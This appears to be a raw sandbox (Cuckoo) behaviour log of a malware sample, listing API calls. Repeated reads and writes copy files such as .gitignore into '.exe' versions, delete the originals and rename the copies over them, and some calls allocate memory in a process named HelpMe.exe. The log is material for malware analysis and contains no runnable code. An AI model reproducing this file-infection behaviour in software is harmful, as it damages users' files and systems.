"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->12288"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->12288"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\cuckoo\dll\ornnwr.dll"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\cuckoo\dll\ornnwr.dll.exe","lpNewFileName->C:\cuckoo\dll\ornnwr.dll"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\files\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\files\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001f0","lpValueName->CommonVideo"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->ProfilesDirectory"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->AllUsersProfile"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001f0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->CommonVideo","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Videos","cbData->112"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f4","hKey->0x000001f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f4","lpValueName->Generation"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToWrite->719"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f6","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f2","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f2","lpValueName->DriveMask"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001f2","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f2","lpValueName->DriveMask"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001d8","nNumberOfBytesToRead->71"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->71"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.597","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\files\.gitignore"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\files\.gitignore.exe","lpNewFileName->C:\cuckoo\files\.gitignore"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->268"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001d8","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\logs\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToRead->61440"
"20190731004116.607","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToWrite->61440"
